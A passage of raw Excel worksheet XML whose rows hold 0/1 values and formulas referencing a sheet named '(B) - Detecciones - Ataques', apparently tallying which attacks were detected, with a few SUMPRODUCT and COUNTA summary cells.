        <f>'(B) - Detecciones - Ataques'!AZ85</f>
        <v>0</v>
      </c>
      <c r="K93" s="271">
        <f>'(B) - Detecciones - Ataques'!BP85</f>
        <v>0</v>
      </c>
      <c r="L93" s="281">
        <f>'(B) - Detecciones - Ataques'!BW85</f>
        <v>0</v>
      </c>
      <c r="M93" s="271">
        <f>'(B) - Detecciones - Ataques'!CM85</f>
        <v>0</v>
      </c>
      <c r="N93" s="281">
        <f>'(B) - Detecciones - Ataques'!CT85</f>
        <v>0</v>
      </c>
      <c r="O93" s="280">
        <f>'(B) - Detecciones - Ataques'!EC85</f>
        <v>0</v>
      </c>
      <c r="P93" s="281">
        <f>'(B) - Detecciones - Ataques'!ED85</f>
        <v>0</v>
      </c>
      <c r="Q93" s="282" t="s">
        <v>13</v>
      </c>
      <c r="AM93" s="299"/>
      <c r="AN93" s="299"/>
      <c r="AO93" s="298"/>
      <c r="AP93" s="299"/>
      <c r="AQ93" s="298"/>
    </row>
    <row r="94" ht="60.0" customHeight="1">
      <c r="B94" s="142" t="s">
        <v>351</v>
      </c>
      <c r="C94" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D94" s="143" t="s">
        <v>911</v>
      </c>
      <c r="E94" s="145" t="s">
        <v>927</v>
      </c>
      <c r="F94" s="280">
        <f>'(B) - Detecciones - Ataques'!P86</f>
        <v>1</v>
      </c>
      <c r="G94" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ86</f>
        <v>0</v>
      </c>
      <c r="H94" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ86</f>
        <v>0</v>
      </c>
      <c r="I94" s="271">
        <f>'(B) - Detecciones - Ataques'!AS86</f>
        <v>0</v>
      </c>
      <c r="J94" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ86</f>
        <v>0</v>
      </c>
      <c r="K94" s="271">
        <f>'(B) - Detecciones - Ataques'!BP86</f>
        <v>0</v>
      </c>
      <c r="L94" s="281">
        <f>'(B) - Detecciones - Ataques'!BW86</f>
        <v>0</v>
      </c>
      <c r="M94" s="271">
        <f>'(B) - Detecciones - Ataques'!CM86</f>
        <v>0</v>
      </c>
      <c r="N94" s="281">
        <f>'(B) - Detecciones - Ataques'!CT86</f>
        <v>0</v>
      </c>
      <c r="O94" s="280">
        <f>'(B) - Detecciones - Ataques'!EC86</f>
        <v>1</v>
      </c>
      <c r="P94" s="281">
        <f>'(B) - Detecciones - Ataques'!ED86</f>
        <v>1</v>
      </c>
      <c r="Q94" s="282" t="s">
        <v>112</v>
      </c>
      <c r="AM94" s="299"/>
      <c r="AN94" s="299"/>
      <c r="AO94" s="298"/>
      <c r="AP94" s="299"/>
      <c r="AQ94" s="298"/>
    </row>
    <row r="95" ht="60.0" customHeight="1">
      <c r="B95" s="142" t="s">
        <v>351</v>
      </c>
      <c r="C95" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D95" s="143" t="s">
        <v>933</v>
      </c>
      <c r="E95" s="145" t="s">
        <v>937</v>
      </c>
      <c r="F95" s="280">
        <f>'(B) - Detecciones - Ataques'!P87</f>
        <v>1</v>
      </c>
      <c r="G95" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ87</f>
        <v>1</v>
      </c>
      <c r="H95" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ87</f>
        <v>1</v>
      </c>
      <c r="I95" s="271">
        <f>'(B) - Detecciones - Ataques'!AS87</f>
        <v>0</v>
      </c>
      <c r="J95" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ87</f>
        <v>0</v>
      </c>
      <c r="K95" s="271">
        <f>'(B) - Detecciones - Ataques'!BP87</f>
        <v>0</v>
      </c>
      <c r="L95" s="281">
        <f>'(B) - Detecciones - Ataques'!BW87</f>
        <v>0</v>
      </c>
      <c r="M95" s="271">
        <f>'(B) - Detecciones - Ataques'!CM87</f>
        <v>0</v>
      </c>
      <c r="N95" s="281">
        <f>'(B) - Detecciones - Ataques'!CT87</f>
        <v>0</v>
      </c>
      <c r="O95" s="280">
        <f>'(B) - Detecciones - Ataques'!EC87</f>
        <v>0</v>
      </c>
      <c r="P95" s="281">
        <f>'(B) - Detecciones - Ataques'!ED87</f>
        <v>0</v>
      </c>
      <c r="Q95" s="282" t="s">
        <v>13</v>
      </c>
      <c r="AM95" s="299"/>
      <c r="AN95" s="299"/>
      <c r="AO95" s="298"/>
      <c r="AP95" s="299"/>
      <c r="AQ95" s="298"/>
    </row>
    <row r="96" ht="60.0" customHeight="1">
      <c r="B96" s="142" t="s">
        <v>351</v>
      </c>
      <c r="C96" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D96" s="143" t="s">
        <v>942</v>
      </c>
      <c r="E96" s="145" t="s">
        <v>948</v>
      </c>
      <c r="F96" s="280">
        <f>'(B) - Detecciones - Ataques'!P88</f>
        <v>1</v>
      </c>
      <c r="G96" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ88</f>
        <v>0</v>
      </c>
      <c r="H96" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ88</f>
        <v>0</v>
      </c>
      <c r="I96" s="271">
        <f>'(B) - Detecciones - Ataques'!AS88</f>
        <v>0</v>
      </c>
      <c r="J96" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ88</f>
        <v>0</v>
      </c>
      <c r="K96" s="271">
        <f>'(B) - Detecciones - Ataques'!BP88</f>
        <v>0</v>
      </c>
      <c r="L96" s="281">
        <f>'(B) - Detecciones - Ataques'!BW88</f>
        <v>0</v>
      </c>
      <c r="M96" s="271">
        <f>'(B) - Detecciones - Ataques'!CM88</f>
        <v>0</v>
      </c>
      <c r="N96" s="281">
        <f>'(B) - Detecciones - Ataques'!CT88</f>
        <v>0</v>
      </c>
      <c r="O96" s="280">
        <f>'(B) - Detecciones - Ataques'!EC88</f>
        <v>0</v>
      </c>
      <c r="P96" s="281">
        <f>'(B) - Detecciones - Ataques'!ED88</f>
        <v>0</v>
      </c>
      <c r="Q96" s="282" t="s">
        <v>112</v>
      </c>
      <c r="AM96" s="299"/>
      <c r="AN96" s="299"/>
      <c r="AO96" s="298"/>
      <c r="AP96" s="299"/>
      <c r="AQ96" s="298"/>
      <c r="AT96" s="22" t="s">
        <v>1519</v>
      </c>
      <c r="AU96" s="37">
        <f>SUMPRODUCT(--(AV12:AV87 &gt; AX12:AX87))</f>
        <v>15</v>
      </c>
      <c r="AV96" s="37">
        <f>SUMPRODUCT(--(AV12:AV87=AX12:AX87))</f>
        <v>53</v>
      </c>
      <c r="AW96" s="37">
        <f>SUMPRODUCT(--(AV12:AV87&lt;AX12:AX87))</f>
        <v>8</v>
      </c>
      <c r="AX96" s="37">
        <f>COUNTA(AS12:AS87)</f>
        <v>76</v>
      </c>
    </row>
    <row r="97" ht="60.0" customHeight="1">
      <c r="B97" s="142" t="s">
        <v>351</v>
      </c>
      <c r="C97" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D97" s="143" t="s">
        <v>952</v>
      </c>
      <c r="E97" s="145" t="s">
        <v>1520</v>
      </c>
      <c r="F97" s="280">
        <f>'(B) - Detecciones - Ataques'!P89</f>
        <v>1</v>
      </c>
      <c r="G97" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ89</f>
        <v>0</v>
      </c>
      <c r="H97" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ89</f>
        <v>0</v>
      </c>
      <c r="I97" s="271">
        <f>'(B) - Detecciones - Ataques'!AS89</f>
        <v>0</v>
      </c>
      <c r="J97" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ89</f>
        <v>0</v>
      </c>
      <c r="K97" s="271">
        <f>'(B) - Detecciones - Ataques'!BP89</f>
        <v>0</v>
      </c>
      <c r="L97" s="281">
        <f>'(B) - Detecciones - Ataques'!BW89</f>
        <v>0</v>
      </c>
      <c r="M97" s="271">
        <f>'(B) - Detecciones - Ataques'!CM89</f>
        <v>0</v>
      </c>
      <c r="N97" s="281">
        <f>'(B) - Detecciones - Ataques'!CT89</f>
        <v>0</v>
      </c>
      <c r="O97" s="280">
        <f>'(B) - Detecciones - Ataques'!EC89</f>
        <v>0</v>
      </c>
      <c r="P97" s="281">
        <f>'(B) - Detecciones - Ataques'!ED89</f>
        <v>0</v>
      </c>
      <c r="Q97" s="282" t="s">
        <v>112</v>
      </c>
      <c r="AM97" s="299"/>
      <c r="AN97" s="299"/>
      <c r="AO97" s="298"/>
      <c r="AP97" s="299"/>
      <c r="AQ97" s="298"/>
    </row>
    <row r="98" ht="60.0" customHeight="1">
      <c r="B98" s="142" t="s">
        <v>351</v>
      </c>
      <c r="C98" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D98" s="143" t="s">
        <v>961</v>
      </c>
      <c r="E98" s="145" t="s">
        <v>967</v>
      </c>
      <c r="F98" s="280">
        <f>'(B) - Detecciones - Ataques'!P91</f>
        <v>1</v>
      </c>
      <c r="G98" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ91</f>
        <v>0</v>
      </c>
      <c r="H98" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ91</f>
        <v>0</v>
      </c>
      <c r="I98" s="271">
        <f>'(B) - Detecciones - Ataques'!AS91</f>
        <v>0</v>
      </c>
      <c r="J98" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ91</f>
        <v>0</v>
      </c>
      <c r="K98" s="271">
        <f>'(B) - Detecciones - Ataques'!BP91</f>
        <v>0</v>
      </c>
      <c r="L98" s="281">
        <f>'(B) - Detecciones - Ataques'!BW91</f>
        <v>0</v>
      </c>
      <c r="M98" s="271">
        <f>'(B) - Detecciones - Ataques'!CM91</f>
        <v>0</v>
      </c>
      <c r="N98" s="281">
        <f>'(B) - Detecciones - Ataques'!CT91</f>
        <v>0</v>
      </c>
      <c r="O98" s="280">
        <f>'(B) - Detecciones - Ataques'!EC91</f>
        <v>0</v>
      </c>
      <c r="P98" s="281">
        <f>'(B) - Detecciones - Ataques'!ED91</f>
        <v>0</v>
      </c>
      <c r="Q98" s="282" t="s">
        <v>112</v>
      </c>
      <c r="AM98" s="299"/>
      <c r="AN98" s="299"/>
      <c r="AO98" s="298"/>
      <c r="AP98" s="299"/>
      <c r="AQ98" s="298"/>
    </row>
    <row r="99" ht="60.0" customHeight="1">
      <c r="B99" s="142" t="s">
        <v>351</v>
      </c>
      <c r="C99" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D99" s="143" t="s">
        <v>975</v>
      </c>
      <c r="E99" s="145" t="s">
        <v>979</v>
      </c>
      <c r="F99" s="280">
        <f>'(B) - Detecciones - Ataques'!P92</f>
        <v>1</v>
      </c>
      <c r="G99" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ92</f>
        <v>0</v>
      </c>
      <c r="H99" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ92</f>
        <v>0</v>
      </c>
      <c r="I99" s="271">
        <f>'(B) - Detecciones - Ataques'!AS92</f>
        <v>0</v>
      </c>
      <c r="J99" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ92</f>
        <v>0</v>
      </c>
      <c r="K99" s="271">
        <f>'(B) - Detecciones - Ataques'!BP92</f>
        <v>0</v>
      </c>
      <c r="L99" s="281">
        <f>'(B) - Detecciones - Ataques'!BW92</f>
        <v>0</v>
      </c>
      <c r="M99" s="271">
        <f>'(B) - Detecciones - Ataques'!CM92</f>
        <v>0</v>
      </c>
      <c r="N99" s="281">
        <f>'(B) - Detecciones - Ataques'!CT92</f>
        <v>0</v>
      </c>
      <c r="O99" s="280">
        <f>'(B) - Detecciones - Ataques'!EC92</f>
        <v>1</v>
      </c>
      <c r="P99" s="281">
        <f>'(B) - Detecciones - Ataques'!ED92</f>
        <v>1</v>
      </c>
      <c r="Q99" s="282" t="s">
        <v>13</v>
      </c>
      <c r="AM99" s="299"/>
      <c r="AN99" s="299"/>
      <c r="AO99" s="298"/>
      <c r="AP99" s="299"/>
      <c r="AQ99" s="298"/>
    </row>
    <row r="100" ht="60.0" customHeight="1">
      <c r="B100" s="142" t="s">
        <v>351</v>
      </c>
      <c r="C100" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D100" s="143" t="s">
        <v>983</v>
      </c>
      <c r="E100" s="145" t="s">
        <v>987</v>
      </c>
      <c r="F100" s="280">
        <f>'(B) - Detecciones - Ataques'!P93</f>
        <v>1</v>
      </c>
      <c r="G100" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ93</f>
        <v>0</v>
      </c>
      <c r="H100" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ93</f>
        <v>0</v>
      </c>
      <c r="I100" s="271">
        <f>'(B) - Detecciones - Ataques'!AS93</f>
        <v>0</v>
      </c>
      <c r="J100" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ93</f>
        <v>0</v>
      </c>
      <c r="K100" s="271">
        <f>'(B) - Detecciones - Ataques'!BP93</f>
        <v>0</v>
      </c>
      <c r="L100" s="281">
        <f>'(B) - Detecciones - Ataques'!BW93</f>
        <v>0</v>
      </c>
      <c r="M100" s="271">
        <f>'(B) - Detecciones - Ataques'!CM93</f>
        <v>0</v>
      </c>
      <c r="N100" s="281">
        <f>'(B) - Detecciones - Ataques'!CT93</f>
        <v>0</v>
      </c>
      <c r="O100" s="280">
        <f>'(B) - Detecciones - Ataques'!EC93</f>
        <v>1</v>
      </c>
      <c r="P100" s="281">
        <f>'(B) - Detecciones - Ataques'!ED93</f>
        <v>1</v>
      </c>
      <c r="Q100" s="282" t="s">
        <v>112</v>
      </c>
      <c r="AM100" s="299"/>
      <c r="AN100" s="299"/>
      <c r="AO100" s="298"/>
      <c r="AP100" s="299"/>
      <c r="AQ100" s="298"/>
    </row>
    <row r="101" ht="60.0" customHeight="1">
      <c r="B101" s="142" t="s">
        <v>351</v>
      </c>
      <c r="C101" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D101" s="143" t="s">
        <v>991</v>
      </c>
      <c r="E101" s="145" t="s">
        <v>997</v>
      </c>
      <c r="F101" s="280">
        <f>'(B) - Detecciones - Ataques'!P94</f>
        <v>1</v>
      </c>
      <c r="G101" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ94</f>
        <v>0</v>
      </c>
      <c r="H101" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ94</f>
        <v>0</v>
      </c>
      <c r="I101" s="271">
        <f>'(B) - Detecciones - Ataques'!AS94</f>
        <v>0</v>
      </c>
      <c r="J101" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ94</f>
        <v>0</v>
      </c>
      <c r="K101" s="271">
        <f>'(B) - Detecciones - Ataques'!BP94</f>
        <v>0</v>
      </c>
      <c r="L101" s="281">
        <f>'(B) - Detecciones - Ataques'!BW94</f>
        <v>0</v>
      </c>
      <c r="M101" s="271">
        <f>'(B) - Detecciones - Ataques'!CM94</f>
        <v>0</v>
      </c>
      <c r="N101" s="281">
        <f>'(B) - Detecciones - Ataques'!CT94</f>
        <v>0</v>
      </c>
      <c r="O101" s="280">
        <f>'(B) - Detecciones - Ataques'!EC94</f>
        <v>0</v>
      </c>
      <c r="P101" s="281">
        <f>'(B) - Detecciones - Ataques'!ED94</f>
        <v>0</v>
      </c>
      <c r="Q101" s="282" t="s">
        <v>13</v>
      </c>
      <c r="AM101" s="299"/>
      <c r="AN101" s="299"/>
      <c r="AO101" s="298"/>
      <c r="AP101" s="299"/>
      <c r="AQ101" s="298"/>
    </row>
    <row r="102" ht="60.0" customHeight="1">
      <c r="B102" s="142" t="s">
        <v>351</v>
      </c>
      <c r="C102" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D102" s="143" t="s">
        <v>1000</v>
      </c>
      <c r="E102" s="145" t="s">
        <v>1521</v>
      </c>
      <c r="F102" s="280">
        <f>'(B) - Detecciones - Ataques'!P95</f>
        <v>1</v>
      </c>
      <c r="G102" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ95</f>
        <v>0</v>
      </c>
      <c r="H102" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ95</f>
        <v>0</v>
      </c>
      <c r="I102" s="271">
        <f>'(B) - Detecciones - Ataques'!AS95</f>
        <v>0</v>
      </c>
      <c r="J102" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ95</f>
        <v>0</v>
      </c>
      <c r="K102" s="271">
        <f>'(B) - Detecciones - Ataques'!BP95</f>
        <v>0</v>
      </c>
      <c r="L102" s="281">
        <f>'(B) - Detecciones - Ataques'!BW95</f>
        <v>0</v>
      </c>
      <c r="M102" s="271">
        <f>'(B) - Detecciones - Ataques'!CM95</f>
        <v>0</v>
      </c>
      <c r="N102" s="281">
        <f>'(B) - Detecciones - Ataques'!CT95</f>
        <v>0</v>
      </c>
      <c r="O102" s="280">
        <f>'(B) - Detecciones - Ataques'!EC95</f>
        <v>0</v>
      </c>
      <c r="P102" s="281">
        <f>'(B) - Detecciones - Ataques'!ED95</f>
        <v>0</v>
      </c>
      <c r="Q102" s="282" t="s">
        <v>112</v>
      </c>
      <c r="AM102" s="299"/>
      <c r="AN102" s="299"/>
      <c r="AO102" s="298"/>
      <c r="AP102" s="299"/>
      <c r="AQ102" s="298"/>
    </row>
    <row r="103" ht="60.0" customHeight="1">
      <c r="B103" s="142" t="s">
        <v>351</v>
      </c>
      <c r="C103" s="143" t="s">
        <v>1008</v>
      </c>
      <c r="D103" s="143" t="s">
        <v>1009</v>
      </c>
      <c r="E103" s="145" t="s">
        <v>1522</v>
      </c>
      <c r="F103" s="280">
        <f>'(B) - Detecciones - Ataques'!P96</f>
        <v>1</v>
      </c>
      <c r="G103" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ96</f>
        <v>0</v>
      </c>
      <c r="H103" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ96</f>
        <v>0</v>
      </c>
      <c r="I103" s="271">
        <f>'(B) - Detecciones - Ataques'!AS96</f>
        <v>0</v>
      </c>
      <c r="J103" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ96</f>
        <v>0</v>
      </c>
      <c r="K103" s="271">
        <f>'(B) - Detecciones - Ataques'!BP96</f>
        <v>0</v>
      </c>
      <c r="L103" s="281">
        <f>'(B) - Detecciones - Ataques'!BW96</f>
        <v>0</v>
      </c>
      <c r="M103" s="271">
        <f>'(B) - Detecciones - Ataques'!CM96</f>
        <v>0</v>
      </c>
      <c r="N103" s="281">
        <f>'(B) - Detecciones - Ataques'!CT96</f>
        <v>0</v>
      </c>
      <c r="O103" s="280">
        <f>'(B) - Detecciones - Ataques'!EC96</f>
        <v>0</v>
      </c>
      <c r="P103" s="281">
        <f>'(B) - Detecciones - Ataques'!ED96</f>
        <v>0</v>
      </c>
      <c r="Q103" s="282" t="s">
        <v>112</v>
      </c>
      <c r="AM103" s="299"/>
      <c r="AN103" s="299"/>
      <c r="AO103" s="298"/>
      <c r="AP103" s="299"/>
      <c r="AQ103" s="298"/>
    </row>
    <row r="104" ht="60.0" customHeight="1">
      <c r="B104" s="296" t="s">
        <v>397</v>
      </c>
      <c r="C104" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D104" s="143" t="s">
        <v>1021</v>
      </c>
      <c r="E104" s="145" t="s">
        <v>1026</v>
      </c>
      <c r="F104" s="280">
        <f>'(B) - Detecciones - Ataques'!P97</f>
        <v>1</v>
      </c>
      <c r="G104" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ97</f>
        <v>0</v>
      </c>
      <c r="H104" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ97</f>
        <v>0</v>
      </c>
      <c r="I104" s="271">
        <f>'(B) - Detecciones - Ataques'!AS97</f>
        <v>0</v>
      </c>
      <c r="J104" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ97</f>
        <v>0</v>
      </c>
      <c r="K104" s="271">
        <f>'(B) - Detecciones - Ataques'!BP97</f>
        <v>0</v>
      </c>
      <c r="L104" s="281">
        <f>'(B) - Detecciones - Ataques'!BW97</f>
        <v>0</v>
      </c>
      <c r="M104" s="271">
        <f>'(B) - Detecciones - Ataques'!CM97</f>
        <v>0</v>
      </c>
      <c r="N104" s="281">
        <f>'(B) - Detecciones - Ataques'!CT97</f>
        <v>0</v>
      </c>
      <c r="O104" s="280">
        <f>'(B) - Detecciones - Ataques'!EC97</f>
        <v>0</v>
      </c>
      <c r="P104" s="281">
        <f>'(B) - Detecciones - Ataques'!ED97</f>
        <v>0</v>
      </c>
      <c r="Q104" s="282" t="s">
        <v>112</v>
      </c>
      <c r="AM104" s="299"/>
      <c r="AN104" s="299"/>
      <c r="AO104" s="298"/>
      <c r="AP104" s="299"/>
      <c r="AQ104" s="298"/>
    </row>
    <row r="105" ht="60.0" customHeight="1">
      <c r="B105" s="296" t="s">
        <v>397</v>
      </c>
      <c r="C105" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D105" s="143" t="s">
        <v>1031</v>
      </c>
      <c r="E105" s="145" t="s">
        <v>1035</v>
      </c>
      <c r="F105" s="280">
        <f>'(B) - Detecciones - Ataques'!P98</f>
        <v>1</v>
      </c>
      <c r="G105" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ98</f>
        <v>1</v>
      </c>
      <c r="H105" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ98</f>
        <v>1</v>
      </c>
      <c r="I105" s="271">
        <f>'(B) - Detecciones - Ataques'!AS98</f>
        <v>0</v>
      </c>
      <c r="J105" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ98</f>
        <v>0</v>
      </c>
      <c r="K105" s="271">
        <f>'(B) - Detecciones - Ataques'!BP98</f>
        <v>0</v>
      </c>
      <c r="L105" s="281">
        <f>'(B) - Detecciones - Ataques'!BW98</f>
        <v>0</v>
      </c>
      <c r="M105" s="271">
        <f>'(B) - Detecciones - Ataques'!CM98</f>
        <v>1</v>
      </c>
      <c r="N105" s="281">
        <f>'(B) - Detecciones - Ataques'!CT98</f>
        <v>1</v>
      </c>
      <c r="O105" s="280">
        <f>'(B) - Detecciones - Ataques'!EC98</f>
        <v>0</v>
      </c>
      <c r="P105" s="281">
        <f>'(B) - Detecciones - Ataques'!ED98</f>
        <v>0</v>
      </c>
      <c r="Q105" s="282" t="s">
        <v>13</v>
      </c>
      <c r="AM105" s="299"/>
      <c r="AN105" s="299"/>
      <c r="AO105" s="298"/>
      <c r="AP105" s="299"/>
      <c r="AQ105" s="298"/>
    </row>
    <row r="106" ht="60.0" customHeight="1">
      <c r="B106" s="296" t="s">
        <v>397</v>
      </c>
      <c r="C106" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D106" s="143" t="s">
        <v>1044</v>
      </c>
      <c r="E106" s="145" t="s">
        <v>1047</v>
      </c>
      <c r="F106" s="280">
        <f>'(B) - Detecciones - Ataques'!P99</f>
        <v>1</v>
      </c>
      <c r="G106" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ99</f>
        <v>0</v>
      </c>
      <c r="H106" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ99</f>
        <v>0</v>
      </c>
      <c r="I106" s="271">
        <f>'(B) - Detecciones - Ataques'!AS99</f>
        <v>0</v>
      </c>
      <c r="J106" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ99</f>
        <v>0</v>
      </c>
      <c r="K106" s="271">
        <f>'(B) - Detecciones - Ataques'!BP99</f>
        <v>0</v>
      </c>
      <c r="L106" s="281">
        <f>'(B) - Detecciones - Ataques'!BW99</f>
        <v>0</v>
      </c>
      <c r="M106" s="271">
        <f>'(B) - Detecciones - Ataques'!CM99</f>
        <v>0</v>
      </c>
      <c r="N106" s="281">
        <f>'(B) - Detecciones - Ataques'!CT99</f>
        <v>0</v>
      </c>
      <c r="O106" s="280">
        <f>'(B) - Detecciones - Ataques'!EC99</f>
        <v>0</v>
      </c>
      <c r="P106" s="281">
        <f>'(B) - Detecciones - Ataques'!ED99</f>
        <v>0</v>
      </c>
      <c r="Q106" s="282" t="s">
        <v>13</v>
      </c>
      <c r="AM106" s="299"/>
      <c r="AN106" s="299"/>
      <c r="AO106" s="298"/>
      <c r="AP106" s="299"/>
      <c r="AQ106" s="298"/>
    </row>
    <row r="107" ht="60.0" customHeight="1">
      <c r="B107" s="142" t="s">
        <v>397</v>
      </c>
      <c r="C107" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D107" s="143" t="s">
        <v>1052</v>
      </c>
      <c r="E107" s="145" t="s">
        <v>1523</v>
      </c>
      <c r="F107" s="280">
        <f>'(B) - Detecciones - Ataques'!P100</f>
        <v>1</v>
      </c>
      <c r="G107" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ100</f>
        <v>0</v>
      </c>
      <c r="H107" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ100</f>
        <v>0</v>
      </c>
      <c r="I107" s="271">
        <f>'(B) - Detecciones - Ataques'!AS100</f>
        <v>0</v>
      </c>
      <c r="J107" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ100</f>
        <v>0</v>
      </c>
      <c r="K107" s="271">
        <f>'(B) - Detecciones - Ataques'!BP100</f>
        <v>0</v>
      </c>
      <c r="L107" s="281">
        <f>'(B) - Detecciones - Ataques'!BW100</f>
        <v>0</v>
      </c>
      <c r="M107" s="271">
        <f>'(B) - Detecciones - Ataques'!CM100</f>
        <v>0</v>
      </c>
      <c r="N107" s="281">
        <f>'(B) - Detecciones - Ataques'!CT100</f>
        <v>0</v>
      </c>
      <c r="O107" s="280">
        <f>'(B) - Detecciones - Ataques'!EC100</f>
        <v>0</v>
      </c>
      <c r="P107" s="281">
        <f>'(B) - Detecciones - Ataques'!ED100</f>
        <v>0</v>
      </c>
      <c r="Q107" s="282" t="s">
        <v>112</v>
      </c>
      <c r="AM107" s="299"/>
      <c r="AN107" s="299"/>
      <c r="AO107" s="298"/>
      <c r="AP107" s="299"/>
      <c r="AQ107" s="298"/>
    </row>
    <row r="108" ht="60.0" customHeight="1">
      <c r="B108" s="142" t="s">
        <v>397</v>
      </c>
      <c r="C108" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D108" s="143" t="s">
        <v>1061</v>
      </c>
      <c r="E108" s="145" t="s">
        <v>1065</v>
      </c>
      <c r="F108" s="280">
        <f>'(B) - Detecciones - Ataques'!P101</f>
        <v>1</v>
      </c>
      <c r="G108" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ101</f>
        <v>0</v>
      </c>
      <c r="H108" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ101</f>
        <v>0</v>
      </c>
      <c r="I108" s="271">
        <f>'(B) - Detecciones - Ataques'!AS101</f>
        <v>0</v>
      </c>
      <c r="J108" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ101</f>
        <v>0</v>
      </c>
      <c r="K108" s="271">
        <f>'(B) - Detecciones - Ataques'!BP101</f>
        <v>0</v>
      </c>
      <c r="L108" s="281">
        <f>'(B) - Detecciones - Ataques'!BW101</f>
        <v>0</v>
      </c>
      <c r="M108" s="271">
        <f>'(B) - Detecciones - Ataques'!CM101</f>
        <v>0</v>
      </c>
      <c r="N108" s="281">
        <f>'(B) - Detecciones - Ataques'!CT101</f>
        <v>0</v>
      </c>
      <c r="O108" s="280">
        <f>'(B) - Detecciones - Ataques'!EC101</f>
        <v>0</v>
      </c>
      <c r="P108" s="281">
        <f>'(B) - Detecciones - Ataques'!ED101</f>
        <v>0</v>
      </c>
      <c r="Q108" s="282" t="s">
        <v>13</v>
      </c>
      <c r="AL108" s="302"/>
      <c r="AM108" s="299"/>
      <c r="AN108" s="299"/>
      <c r="AO108" s="298"/>
      <c r="AP108" s="299"/>
      <c r="AQ108" s="298"/>
    </row>
    <row r="109" ht="60.0" customHeight="1">
      <c r="B109" s="142" t="s">
        <v>397</v>
      </c>
      <c r="C109" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D109" s="143" t="s">
        <v>1072</v>
      </c>
      <c r="E109" s="145" t="s">
        <v>1524</v>
      </c>
      <c r="F109" s="280">
        <f>'(B) - Detecciones - Ataques'!P102</f>
        <v>1</v>
      </c>
      <c r="G109" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ102</f>
        <v>0</v>
      </c>
      <c r="H109" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ102</f>
        <v>0</v>
      </c>
      <c r="I109" s="271">
        <f>'(B) - Detecciones - Ataques'!AS102</f>
        <v>0</v>
      </c>
      <c r="J109" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ102</f>
        <v>0</v>
      </c>
      <c r="K109" s="271">
        <f>'(B) - Detecciones - Ataques'!BP102</f>
        <v>0</v>
      </c>
      <c r="L109" s="281">
        <f>'(B) - Detecciones - Ataques'!BW102</f>
        <v>0</v>
      </c>
      <c r="M109" s="271">
        <f>'(B) - Detecciones - Ataques'!CM102</f>
        <v>0</v>
      </c>
      <c r="N109" s="281">
        <f>'(B) - Detecciones - Ataques'!CT102</f>
        <v>0</v>
      </c>
      <c r="O109" s="280">
        <f>'(B) - Detecciones - Ataques'!EC102</f>
        <v>0</v>
      </c>
      <c r="P109" s="281">
        <f>'(B) - Detecciones - Ataques'!ED102</f>
        <v>0</v>
      </c>
      <c r="Q109" s="282" t="s">
        <v>112</v>
      </c>
      <c r="AM109" s="299"/>
      <c r="AN109" s="299"/>
      <c r="AO109" s="298"/>
      <c r="AP109" s="299"/>
      <c r="AQ109" s="298"/>
    </row>
    <row r="110" ht="60.0" customHeight="1">
      <c r="B110" s="142" t="s">
        <v>397</v>
      </c>
      <c r="C110" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D110" s="143" t="s">
        <v>1072</v>
      </c>
      <c r="E110" s="145" t="s">
        <v>1084</v>
      </c>
      <c r="F110" s="280">
        <f>'(B) - Detecciones - Ataques'!P104</f>
        <v>1</v>
      </c>
      <c r="G110" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ104</f>
        <v>0</v>
